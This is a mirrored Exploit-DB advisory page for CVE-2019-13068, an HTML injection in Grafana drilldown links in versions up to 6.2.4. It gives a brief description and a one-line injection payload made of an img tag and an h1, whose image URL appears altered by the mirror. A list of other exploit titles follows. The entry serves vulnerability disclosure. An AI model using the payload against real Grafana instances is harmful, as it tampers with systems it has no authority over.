Grafana <=6.2.4 - HTML Injection

Exploit Database
38 阅读

作者： SimranJeet Singh

日期： 2023-03-27
类别：
- webapps
平台：
- typescript
来源：https://www.exploit-db.com/exploits/51073/

# Exploit Title: Grafana <=6.2.4 - HTML Injection
# Date: 30-06-2019
# Exploit Author: SimranJeet Singh
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download/6.2.4
# Version: 6.2.4
# CVE : CVE-2019-13068

The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)

Payload used - <img src="https://www.exploit-db.com/exploits/51073/[image_URL]"><h1>Hello</h1>

last Exploits
Grafana <=6.2.4 - HTML Injection的更多信息

Itech Freelancer Script 5.13 – SQL Injection：
Pirelli Discus DRG A125g – Password Disclosure：
FLIR Brickstream 3D+ – RTSP Stream Disclosure：
Joomla! Component com_mochigames – SQL Injection：
Audistats 1.3 – SQL Injection：
FS IMDB Clone 1.0 – ‘f’ / ‘s’ / ‘id’ SQL Injection：
Kagao 3.0 – Multiple Vulnerabilities：
My Little Forum 2.3.7 – Multiple Vulnerabilities：